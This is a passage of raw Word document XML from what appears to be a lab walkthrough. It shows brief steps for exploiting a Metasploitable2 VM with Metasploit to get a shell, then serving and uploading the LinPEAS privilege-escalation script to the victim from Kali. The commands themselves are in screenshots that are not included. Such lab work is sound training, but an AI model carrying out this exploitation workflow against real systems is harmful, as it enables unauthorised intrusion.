              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00FD5EF3">
        <w:t>Start Msfconsole.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC1D647" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="5D463051" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="68B87B0D" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="08558395" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="53A5A725" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="150A233D" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="40F6AB1C" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="520F23BE" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="29DB104F" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="540D69D6" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="21A206FE" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="5FF3065A" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="0947A0DC" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="2567B9E1" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="5B57276E" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="7AFFC3BB" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="731FF3F9" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="3A4031EF" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="650821E7" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="7B215904" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="1BF2DC8F" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="4F041C1C" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="6BB746EB" w14:textId="67E690A4" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD5EF3">
        <w:lastRenderedPageBreak/>
        <w:t>Use the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7128A306" w14:textId="1347DED7" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="009D7392" w:rsidP="00650553">
      <w:r w:rsidRPr="00FD5EF3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251694080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F12BB15" wp14:editId="3CF4C754">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>72197</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4572638" cy="733527"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="392845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845161" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572638" cy="733527"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F030E8C" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="0830AE14" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="736804AB" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="7351E3F4" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="27A2F257" w14:textId="676B2703" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD5EF3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251695104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7391299B" wp14:editId="2F39CC26">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>314216</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4659464" cy="498926"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="384017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017844" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4659464" cy="498926"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00FD5EF3">
        <w:t>Set the target machine to Metasploitable2 vm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3137C042" w14:textId="5F1FF0F1" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="0C758E0E" w14:textId="77777777" w:rsidR="00BB237F" w:rsidRDefault="00BB237F" w:rsidP="00650553"/>
    <w:p w14:paraId="2593E3FF" w14:textId="77777777" w:rsidR="00BB237F" w:rsidRPr="00FD5EF3" w:rsidRDefault="00BB237F" w:rsidP="00650553"/>
    <w:p w14:paraId="42D776D9" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="5EF738A0" w14:textId="43C8FBAF" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="009D7392" w:rsidP="00650553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD5EF3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251696128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="534F8283" wp14:editId="106C408B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>288345</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5319423" cy="3307590"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapNone/>
            <wp:docPr id="1252031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031659" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5319423" cy="3307590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00650553" w:rsidRPr="00FD5EF3">
        <w:t>Run the exploit and we get a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D442B24" w14:textId="35DEEA22" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="4B37D5D3" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="3812E003" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="47289D32" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="7C23534A" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="723F2CB3" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="7CA2C1BD" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="0AEF7376" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="1F2D3CD4" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="25834505" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="37FB868A" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="47653F0A" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="1230337C" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="5E33CF25" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="049EBA01" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="585259A1" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="6A456834" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="03BB7041" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="48CE2D87" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="28B56B90" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="52EC2CC8" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="497EDAB5" w14:textId="6609B182" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD5EF3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251698176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="62792FCC" wp14:editId="2D6CC1F1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>318052</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5438692" cy="1575090"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapNone/>
            <wp:docPr id="546259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259476" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5438692" cy="1575090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00FD5EF3">
        <w:t>Download LinPEAS in Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22993ABB" w14:textId="7D0FE679" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="6B6EDDC4" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="173E8D22" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="55B91E9A" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="39D7DE33" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="297425B7" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="3461B2A6" w14:textId="77777777" w:rsidR="009D7392" w:rsidRDefault="009D7392" w:rsidP="00650553"/>
    <w:p w14:paraId="3D05FB55" w14:textId="77777777" w:rsidR="009D7392" w:rsidRDefault="009D7392" w:rsidP="00650553"/>
    <w:p w14:paraId="43597886" w14:textId="77777777" w:rsidR="009D7392" w:rsidRPr="00FD5EF3" w:rsidRDefault="009D7392" w:rsidP="00650553"/>
    <w:p w14:paraId="67D7B97E" w14:textId="0C09218F" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD5EF3">
        <w:lastRenderedPageBreak/>
        <w:t>Start web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F3F2B6" w14:textId="70C68C81" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553">
      <w:r w:rsidRPr="00FD5EF3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251697152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="456FE4EC" wp14:editId="580500DA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-2098</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4686954" cy="819264"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1609832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832503" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4686954" cy="819264"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB30515" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="34D6F615" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="0D250F33" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553"/>
    <w:p w14:paraId="54A442EF" w14:textId="77777777" w:rsidR="00396549" w:rsidRPr="00FD5EF3" w:rsidRDefault="00396549" w:rsidP="00650553"/>
    <w:p w14:paraId="35AB5C6B" w14:textId="037E102D" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD5EF3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251699200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="62A259AE" wp14:editId="6A16349D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>296766</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5279666" cy="785181"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="398005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005501" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5279666" cy="785181"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00FD5EF3">
        <w:t>Upload linpeas.sh to victim shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A055814" w14:textId="47BB9CE0" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="0A10BDA0" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="5AF945B7" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553"/>
    <w:p w14:paraId="67308F25" w14:textId="77777777" w:rsidR="00396549" w:rsidRPr="00FD5EF3" w:rsidRDefault="00396549" w:rsidP="00650553"/>
    <w:p w14:paraId="3F476C1B" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="320B1E80" w14:textId="61EDCF3C" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD5EF3">
        <w:t>View the linpeas.sh file in the tmp directory in victim shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9DF468" w14:textId="7B34265B" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00396549" w:rsidP="00650553">
      <w:r w:rsidRPr="00FD5EF3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251700224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="77D7CCFD" wp14:editId="2DF21C56">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>78878</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1152525" cy="762000"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1133791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91063" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1152525" cy="762000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B626CE" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="7BFB6B66" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="7AEB1FEB" w14:textId="77777777" w:rsidR="00396549" w:rsidRPr="00FD5EF3" w:rsidRDefault="00396549" w:rsidP="00650553"/>
    <w:p w14:paraId="77541B97" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="70B373A7" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD5EF3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251701248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="29125B63" wp14:editId="7A2BF2F0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>257423</wp:posOffset>
